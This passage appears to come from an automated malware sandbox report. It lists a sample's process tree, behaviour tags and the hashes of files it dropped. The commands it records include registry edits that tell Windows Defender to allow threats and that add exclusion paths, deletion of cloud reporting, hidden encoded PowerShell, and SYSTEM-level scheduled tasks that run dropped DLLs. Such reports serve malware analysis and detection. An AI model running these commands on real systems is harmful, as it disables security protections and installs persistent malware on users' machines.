\"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
C:\Windows\SysWOW64\cmd.exe (depth 3)
Command line: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exe (depth 4)
Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
Command line: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FpvksngNCKIjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FpvksngNCKIjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QqSrWmvdGtwU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QqSrWmvdGtwU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RIuAFuLLU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RIuAFuLLU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cfvymemHCAUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cfvymemHCAUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BekoRFZthbLHeaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BekoRFZthbLHeaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\jUlWXsHGbnJNPdLP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\jUlWXsHGbnJNPdLP\" /t REG_DWORD /d 0 /reg:64;"
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
Command line: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 4)
Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FpvksngNCKIjC" /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqSrWmvdGtwU2" /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqSrWmvdGtwU2" /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RIuAFuLLU" /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RIuAFuLLU" /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cfvymemHCAUn" /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cfvymemHCAUn" /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR" /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR" /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BekoRFZthbLHeaVB /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BekoRFZthbLHeaVB /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\jUlWXsHGbnJNPdLP /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\jUlWXsHGbnJNPdLP /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /CREATE /TN "gxcCBvxEn" /SC once /ST 00:21:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /run /I /tn "gxcCBvxEn"
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /DELETE /F /TN "gxcCBvxEn"
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /CREATE /TN "cfFFKgQyvKFYWQGgS" /SC once /ST 00:16:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\aTeDbPf.exe\" lH /site_id 525403 /S" /V1 /F
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /run /I /tn "cfFFKgQyvKFYWQGgS"
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (depth 1)
Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe (depth 2)
Command line: "C:\Windows\system32\gpupdate.exe" /force
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
-
C:\Windows\system32\gpscript.exe (depth 1)
Command line: gpscript.exe /RefreshSystemParam
-
C:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\aTeDbPf.exe (depth 1)
Command line: C:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\aTeDbPf.exe lH /site_id 525403 /S
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /DELETE /F /TN "bCfEGNwGDQwhWneLvC"
-
C:\Windows\SysWOW64\cmd.exe (depth 2)
Command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
-
C:\Windows\SysWOW64\cmd.exe (depth 2)
Command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RIuAFuLLU\qIsntF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qcUOvNLqmSmqpxF" /V1 /F
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /CREATE /TN "qcUOvNLqmSmqpxF2" /F /xml "C:\Program Files (x86)\RIuAFuLLU\hWSTyae.xml" /RU "SYSTEM"
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /END /TN "qcUOvNLqmSmqpxF"
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /DELETE /F /TN "qcUOvNLqmSmqpxF"
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /CREATE /TN "nCtegvDAmjdVDw" /F /xml "C:\Program Files (x86)\QqSrWmvdGtwU2\qDiwqFm.xml" /RU "SYSTEM"
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /CREATE /TN "VircTphmeRxIj2" /F /xml "C:\ProgramData\BekoRFZthbLHeaVB\rMfVNnD.xml" /RU "SYSTEM"
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /CREATE /TN "BPTpyhbDHEioZHGkr2" /F /xml "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\pGcANWJ.xml" /RU "SYSTEM"
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /CREATE /TN "aTjIGRcnJusWUoAznGe2" /F /xml "C:\Program Files (x86)\FpvksngNCKIjC\TfhVTUk.xml" /RU "SYSTEM"
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /CREATE /TN "vdoHbRZAyoFFuVbVu" /SC once /ST 00:29:11 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\jUlWXsHGbnJNPdLP\fCXSDpnC\FTyDXiB.dll\",#1 /site_id 525403" /V1 /F
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /run /I /tn "vdoHbRZAyoFFuVbVu"
-
C:\Windows\SysWOW64\cmd.exe (depth 2)
Command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
-
C:\Windows\SysWOW64\cmd.exe (depth 2)
Command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
-
C:\Windows\SysWOW64\reg.exe (depth 3)
Command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
-
C:\Windows\SysWOW64\schtasks.exe (depth 2)
Command line: schtasks /DELETE /F /TN "cfFFKgQyvKFYWQGgS"
-
C:\Windows\system32\rundll32.EXE (depth 1)
Command line: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jUlWXsHGbnJNPdLP\fCXSDpnC\FTyDXiB.dll",#1 /site_id 525403
-
C:\Windows\SysWOW64\rundll32.exe (depth 2)
Command line: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jUlWXsHGbnJNPdLP\fCXSDpnC\FTyDXiB.dll",#1 /site_id 525403
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exe (depth 3)
Command line: schtasks /DELETE /F /TN "vdoHbRZAyoFFuVbVu"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Program Files (x86)\FpvksngNCKIjC\TfhVTUk.xml
Filesize: 2KB
MD5: 72c2e86551b289b154762178ee009b40
SHA1: 1d66930eafa8e5edb68475ac7656cf3880886c19
SHA256: 11b090d0e297dde633d8aa979eb0a2e05cb93a3467b69477aa41b3b6ff77516a
SHA512: 2cfb6a88f0644715fc4d2fecd83c8a928d9bdd0f81ef4edd6f0515ecb5925ea5844d88fc1debddc5b48845e936035bc9321a448b02776bff65eccf5c08675141
-
C:\Program Files (x86)\QqSrWmvdGtwU2\qDiwqFm.xml
Filesize: 2KB
MD5: 9f9035769df5a448a3cb1511ab5d95d0
SHA1: 389a26a98bff59235c787a3c4c59183a22dad440
SHA256: 545aab4d21d1f4959ee463994053af9ee874bf6028eba1b052b4ef4b8e892df8
SHA512: ecec07e57fa318719edae9816b80c203224ef59cfb44c83ffd3d852fd6d5170da68549a44c297f6f0072bb11e170d2e797ef5f1237515b144bc0eaf47d5d8d98
-
C:\Program Files (x86)\RIuAFuLLU\hWSTyae.xml
Filesize: 2KB
MD5: f2d5ec2f6e990810394dfe4721dd5a60
SHA1: 605bd37dacef18fd5015c0e4b9f560f3d219d9ea
SHA256: 452bb0e0f18ed685e03b77a34c262a3b3ea37f685ba4351ee5aaf6cd95ccd562
SHA512: d6eee7458b321a85a65172d52aeafa36d2dc786c6b645771ba11191de0e62c11b7973a599ede1af9aacca9f94665e952996da132e5dca533f96f2fc802e695d1
-
C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\pGcANWJ.xml
Filesize: 2KB
MD5: 469bc0c243879c688ceafc5ce2cda889
SHA1: 044175e80ba91409c1dfb9aadfc5cf724cace51f
SHA256: 8f8a14b4bffe16e798af228c09a7296a22c7ede2f8bdddf11d59159cf348ff40
SHA512: 7b591761cea963df3fb81dfd3f3972215de1cc65e83a3c99b944070d023b004241c2dace5653947d0afd93f6dbd557c77cb614e422e2736c1b0a5bf8b20adec3
-
C:\ProgramData\BekoRFZthbLHeaVB\rMfVNnD.xml
Filesize: 2KB
MD5: 9196a47223d7fa5fe6684f328f374ace
SHA1: 236f9332491bc91bb6616d35b5490e3009098b7e
SHA256: 62f937088967ecfd2ffce02f1ea20816769a8c4ce6dff2a52abcb035059d5c05
SHA512: 27e0e614bbf3f9d916963100f9c5f8dfe2887f41f992e27ec145b7efb1af09727a2751328214718c1409e90407ef3d203e676cc1ed6eee14c5b4f0b4fa0053e0
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize: 2KB
MD5: 6cf293cb4d80be23433eecf74ddb5503
SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 64B
MD5: 50a8221b93fbd2628ac460dd408a9fc1
SHA1: 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256: 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA512: 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
C:\Users\Admin\AppData\Local\Temp\7zS9CF0.tmp\Install.exe
Filesize: 6.2MB
MD5: 7dc21db165675d7494f9c528235c1f2f
SHA1: 00f04ee80c3e19d22c4a224f7aeb95ddf69571cc
SHA256: a5b2ab287d56c737ca5ffaf39dfd9345f91b88706dffee4e00dda8f48dff278b
SHA512: ec99a73032ece6733aae86e90eefcc184c694e5bf75e0b70776b63f616d8edf23e3532547fee30be6cfb0cb4fdbdc1635c8e7e5996c2c3b93e2025247d57706d
-
C:\Users\Admin\AppData\Local\Temp\7zS9FDE.tmp\Install.exe
Filesize: 6.7MB
MD5: a3a5844f879f532ab98d5ba18ca099bf
SHA1: 12d23302494fcb3a45c0e43c56bc100dbfda84ad
SHA256: c0d938a16e6e3f34e89df5588f6ac47c9ab57e8b25a210f34944679776c919a1
SHA512: b83086d378fa26dd057b8c683b57fd89db2f6d2a6f7d1dca9ecf66efc097fd8310a0e567da8965c6769d9eee3ade6933ee7a795d04bb20f6d15d7ec3464630a7
-
C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\FdzMbCA.exe
Filesize: 6.7MB
MD5: a3a5844f879f532ab98d5ba18ca099bf
SHA1: 12d23302494fcb3a45c0e43c56bc100dbfda84ad
SHA256: c0d938a16e6e3f34e89df5588f6ac47c9ab57e8b25a210f34944679776c919a1
SHA512: b83086d378fa26dd057b8c683b57fd89db2f6d2a6f7d1dca9ecf66efc097fd8310a0e567da8965c6769d9eee3ade6933ee7a795d04bb20f6d15d7ec3464630a7
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize: 1KB
MD5: 33b19d75aa77114216dbc23f43b195e3
SHA1: 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256: b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512: 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 11KB
MD5: b65e199670fbe77add43cdf17d124b54
SHA1: 7eaa9a80cb08057eb0763035f4aaf71011cff46d
SHA256: de5a15151d9101ad540c66890ce914f42d59bd6f168311cab735d7303e28034b
SHA512: aed90a34a50f9f0690533f1b64f5bb9f598fa668eb1c6f72f3d778b297c13ee7579a5f5ca23892530aa63bd0e6274bb2e38b707e8e5cd6cc5818b73336d61ed7
-
